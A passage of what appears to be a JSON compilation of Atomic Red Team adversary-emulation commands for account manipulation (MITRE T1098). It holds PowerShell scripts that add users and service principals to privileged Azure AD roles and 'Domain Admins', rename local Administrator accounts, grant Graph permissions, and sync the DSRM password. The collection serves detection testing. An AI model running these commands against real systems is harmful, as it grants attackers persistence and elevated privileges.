-ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential 
-ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"SuperSP\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", 
$Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"Reader\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"Azure subscription 1\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", 
$Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication -DisplayName \"#{application_name}\"\n$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq \"#{application_name}\"}\n\n#Get Service Principal of Microsoft Graph Resource API \n$graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq \"Microsoft Graph\"}\n\n#Initialize RequiredResourceAccess for Microsoft Graph Resource API \n$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId = $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set Application Permissions\n$ApplicationPermissions = @('#{application_permission}')\n\n$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type = \"Role\"\n$resourceAccess.Id = $reqPermission.Id \n#Add required app permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host \"App permission $permission not found in the Graph Resource API\" -ForegroundColor Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set permissions in existing Azure AD App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}\n\nNew-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id 
$reqPermission.Id\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication -DisplayName \"#{application_name}\"\n$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq \"#{application_name}\"}\n\n#Get Service Principal of Microsoft Graph Resource API \n$graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq \"Microsoft Graph\"}\n\n#Initialize RequiredResourceAccess for Microsoft Graph Resource API \n$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId = $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set Application Permissions\n$ApplicationPermissions = @('#{application_permission}')\n\n$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type = \"Role\"\n$resourceAccess.Id = $reqPermission.Id \n#Add required app permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host \"App permission $permission not found in the Graph Resource API\" -ForegroundColor Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set permissions in existing Azure AD App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal = 
Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}\n\nNew-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication -DisplayName \"test_app\"\n$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq \"test_app\"}\n\n#Get Service Principal of Microsoft Graph Resource API \n$graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq \"Microsoft Graph\"}\n\n#Initialize RequiredResourceAccess for Microsoft Graph Resource API \n$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId = $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set Application Permissions\n$ApplicationPermissions = @('#{application_permission}')\n\n$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type = \"Role\"\n$resourceAccess.Id = $reqPermission.Id \n#Add required app permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host \"App permission $permission not found in the Graph Resource API\" -ForegroundColor Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object 
System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set permissions in existing Azure AD App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}\n\nNew-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication -DisplayName \"#{application_name}\"\n$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq \"#{application_name}\"}\n\n#Get Service Principal of Microsoft Graph Resource API \n$graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq \"Microsoft Graph\"}\n\n#Initialize RequiredResourceAccess for Microsoft Graph Resource API \n$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId = $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set Application Permissions\n$ApplicationPermissions = @('DirectoryRecommendations.Read.All')\n\n$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type = \"Role\"\n$resourceAccess.Id = $reqPermission.Id \n#Add required app 
permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host \"App permission $permission not found in the Graph Resource API\" -ForegroundColor Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set permissions in existing Azure AD App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}\n\nNew-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id\n", + "ntdsutil \"set dsrm password\" \"sync from domain account %username%\" \"q\" \"q\"\n", + "powershell/management/honeyhash", + "powershell/situational_awareness/network/powerview/set_ad_object" + ], + "commands": [ + { + "command": "$x = Get-Random -Minimum 2 -Maximum 9999\n$y = Get-Random -Minimum 2 -Maximum 9999\n$z = Get-Random -Minimum 2 -Maximum 9999\n$w = Get-Random -Minimum 2 -Maximum 9999\nWrite-Host HaHa_$x$y$z\n\n$fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match \"User\" -and $_.PrincipalSource -match \"Local\"} | Select Name\n\nforeach($member in $fmm) {\n if($member -like \"*Administrator*\") {\n $account = $member.Name -replace \".+\\\\\\\",\"\" # strip computername\\\n $originalDescription = (Get-LocalUser -Name $account).Description\n Set-LocalUser -Name $account -Description \"atr:$account;$originalDescription\".Substring(0,48) # Keep original name in description\n Rename-LocalUser -Name $account -NewName \"HaHa_$x$y$z\" # Required due to length limitation\n Write-Host \"Successfully Renamed $account Account on \" $Env:COMPUTERNAME\n }\n }\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red 
Team Test - Account Manipulation" + }, + { + "command": "$x = Get-Random -Minimum 2 -Maximum 99\n$y = Get-Random -Minimum 2 -Maximum 99\n$z = Get-Random -Minimum 2 -Maximum 99\n$w = Get-Random -Minimum 2 -Maximum 99\n\nImport-Module ActiveDirectory\n$account = \"atr--$x$y$z\"\nNew-ADUser -Name $account -GivenName \"Test\" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args}\nAdd-ADGroupMember \"#{group}\" $account\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "$x = Get-Random -Minimum 2 -Maximum 99\n$y = Get-Random -Minimum 2 -Maximum 99\n$z = Get-Random -Minimum 2 -Maximum 99\n$w = Get-Random -Minimum 2 -Maximum 99\n\nImport-Module ActiveDirectory\n$account = \"#{account_prefix}-$x$y$z\"\nNew-ADUser -Name $account -GivenName \"Test\" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args}\nAdd-ADGroupMember \"Domain Admins\" $account\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "$x = Get-Random -Minimum 2 -Maximum 99\n$y = Get-Random -Minimum 2 -Maximum 99\n$z = Get-Random -Minimum 2 -Maximum 99\n$w = Get-Random -Minimum 2 -Maximum 99\n\nImport-Module ActiveDirectory\n$account = \"#{account_prefix}-$x$y$z\"\nNew-ADUser -Name $account -GivenName \"Test\" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False \nAdd-ADGroupMember \"#{group}\" $account\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "aws iam create-group --group-name atomicredteam\naws iam add-user-to-group --user-name atomicredteam --group-name atomicredteam\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" 
-AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$user = Get-AzureADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId\nWrite-Host \"User $($user.DisplayName) was added to $($role.DisplayName) role\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$user = Get-AzureADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId\nWrite-Host \"User $($user.DisplayName) was added to $($role.DisplayName) role\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$user = Get-AzureADUser | where-object {$_.DisplayName -eq \"SuperUser\"}\nif ($user -eq $null) { 
Write-Warning \"User not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId\nWrite-Host \"User $($user.DisplayName) was added to $($role.DisplayName) role\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$user = Get-AzureADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"Global Reader\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId\nWrite-Host \"User $($user.DisplayName) was added to $($role.DisplayName) role\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId 
-RefObjectId $sp.ObjectId\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.DisplayName)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.DisplayName)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq \"SuperSP\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.DisplayName)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module 
-Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"Global Reader\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.DisplayName)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name Az.Resources\n$PWord = 
ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"SuperUser\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "source": 
"atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"Reader\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"Azure subscription 1\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope 
/subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = 
